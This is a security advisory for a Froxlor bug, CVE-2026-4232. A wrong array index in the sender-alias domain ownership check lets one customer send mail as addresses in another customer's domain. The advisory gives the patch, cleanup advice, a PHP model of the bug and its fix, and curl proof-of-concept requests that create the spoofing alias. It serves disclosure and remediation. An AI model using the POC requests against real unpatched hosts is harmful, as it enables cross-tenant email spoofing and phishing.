# Vulnerability Summary: Froxlor Email Sender Alias Domain Ownership Bypass

## Vulnerability Overview

**Title**: Email Sender Alias Domain Ownership Bypass via Wrong Array Index Allows Cross-Customer Email Spoofing

**CVE ID**: CVE-2026-4232

**CVSS Score**: 5.0 / 10 (Moderate)

**Affected Versions**: `froxlor/froxlor` (Composer) <= 2.3.0

**Fixed Version**: 2.3.6

**Description**: In Froxlor, when a customer adds a full email address (rather than an `@domain` wildcard) as an allowed sender, the code splits the address on `@` but uses the wrong array index, passing the local part instead of the domain to `validateLocalDomainOwnership`. Because the local part (for example `ceo`) never matches a locally hosted domain, the ownership check passes for this non-existent "domain", so any authenticated customer can add a sender alias for an address in a domain that belongs to another customer. Postfix's `sender_login_maps` then authorizes the attacker's mail account to send mail from that address.

## Impact Scope

* **Cross-Customer Email Spoofing**: An attacker can send mail impersonating addresses in other customers' domains, bypassing Postfix's `smtpd_sender_login_maps` restriction.
* **Multi-Tenant Isolation Breakdown**: The domain ownership check (`validateLocalDomainOwnership`) is the sole barrier between tenants for sender aliases, and it is completely ineffective for full email addresses.
* **Phishing and Reputation Damage**: Spoofed mail originates from the legitimate mail server, so it passes SPF and, where the server signs for the target domain, DKIM, and may damage the target domain's reputation.

## Remediation

Upgrade to 2.3.6 or later. The fix changes the array index on line 100 of `lib/Froxlor/Api/Commands/EmailSender.php` from `[0]` to `[1]` so that the domain part, not the local part, is passed to the ownership check. Because the fix only affects the `EmailSender.add` path, sender aliases that were created while the instance was vulnerable remain in `mail_sender_aliases` after the upgrade and should be reviewed for entries whose sender domain is not owned by the alias's customer.

**Code Change**:

```php
// Before (line 100): index 0 is the local part, e.g. "ceo"
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");

// After: index 1 is the domain, e.g. "domain-b.com"
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? "");
```

## POC Code

```bash
# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled
# Two customers: Customer A (mail.domain-a.com) and Customer B (mail.domain-b.com)

# Step 1: As Customer A, add a sender alias claiming Customer B's domain via the API
curl -X POST 'https://froxlor-host/api/v1/' \
  -H 'Authorization: Basic customer-a-credentials' \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "EmailSender.add",
    "params": {
      "emailaddr": "myaccount@domain-a.com",
      "allowed_sender": "ceo@domain-b.com"
    }
  }'
# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK - the alias is created because validateLocalDomainOwnership
#         receives "ceo" (local part) instead of "domain-b.com" (domain)

# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' \
  -H 'Authorization: Basic customer-a-credentials' \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "EmailSender.listing",
    "params": {"emailaddr": "myaccount@domain-a.com"}
  }'

# Step 3: Customer A can now send email as ceo@domain-b.com via SMTP,
# because Postfix sender_login_maps will match the mail_sender_aliases entry
# and authorize Customer A's mail account to use that sender address.
```
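The following is an added example, not Froxlor's code, that models the ownership check described above against a constructed domain table so the effect of the wrong index can be seen end to end. The table shape, the customer ids and the assumption that `validateLocalDomainOwnership` rejects only a domain that is hosted locally and owned by a different customer (which is what makes a non-existent "domain" pass) are all assumptions made for the example; the "fixed" extractor also adds a malformed-address check that goes beyond the upstream one-index change.

```php
<?php
// Added example, not Froxlor's code. Models the bug and fix described above.
declare(strict_types=1);

// Constructed stand-in for the local domains table: domain => owning customer id.
const DOMAINS = [
    'domain-a.com' => 1, // Customer A
    'domain-b.com' => 2, // Customer B
];

final class SenderDomainNotOwned extends RuntimeException {}

/**
 * Assumed shape of validateLocalDomainOwnership(): reject only when the
 * domain is hosted locally AND belongs to another customer. A string that
 * matches no local domain is accepted, which is exactly what the bug relies on.
 */
function validateLocalDomainOwnership(string $domain, int $customerId): void
{
    $domain = strtolower(trim($domain));
    if (isset(DOMAINS[$domain]) && DOMAINS[$domain] !== $customerId) {
        throw new SenderDomainNotOwned("senderdomainnotowned: $domain");
    }
}

/** Vulnerable extraction: index 0 of explode() is the local part, not the domain. */
function senderDomainVulnerable(string $allowedSender): string
{
    if (str_starts_with($allowedSender, '@')) {
        return substr($allowedSender, 1); // "@domain" wildcard was always handled correctly
    }
    return explode('@', $allowedSender)[0] ?? ''; // bug: yields "ceo" for "ceo@domain-b.com"
}

/** Fixed extraction: index 1 is the domain; also refuse anything that is not local@domain. */
function senderDomainFixed(string $allowedSender): string
{
    if (str_starts_with($allowedSender, '@')) {
        return substr($allowedSender, 1);
    }
    $parts = explode('@', $allowedSender);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        throw new InvalidArgumentException("malformed allowed_sender: $allowedSender");
    }
    return $parts[1];
}

/** True if the alias would be accepted for the given customer with the given extractor. */
function aliasAccepted(callable $extract, string $allowedSender, int $customerId): bool
{
    try {
        validateLocalDomainOwnership($extract($allowedSender), $customerId);
        return true;
    } catch (SenderDomainNotOwned $e) {
        return false;
    }
}

// Customer A (id 1) tries to claim an address in Customer B's domain.
$attack = 'ceo@domain-b.com';
printf("vulnerable, %-18s: %s\n", $attack, aliasAccepted('senderDomainVulnerable', $attack, 1) ? 'ACCEPTED' : 'rejected');
printf("fixed,      %-18s: %s\n", $attack, aliasAccepted('senderDomainFixed', $attack, 1) ? 'ACCEPTED' : 'rejected');
// The wildcard form never had the problem, and a customer's own domain must still be accepted.
printf("vulnerable, %-18s: %s\n", '@domain-b.com', aliasAccepted('senderDomainVulnerable', '@domain-b.com', 1) ? 'ACCEPTED' : 'rejected');
printf("fixed,      %-18s: %s\n", 'me@domain-a.com', aliasAccepted('senderDomainFixed', 'me@domain-a.com', 1) ? 'ACCEPTED' : 'rejected');
```

Run with `php example.php`: the vulnerable path accepts `ceo@domain-b.com` for Customer A because the check is handed the string `ceo`, which is not a local domain; the fixed path hands it `domain-b.com`, finds it owned by customer 2 and rejects it, while `@domain-b.com` is rejected on both paths and `me@domain-a.com` remains accepted. Note that the check as modelled is permissive for domains not hosted locally, so Froxlor can only enforce ownership among its own tenants; SPF and DKIM on the receiving side are what limit spoofing of external domains.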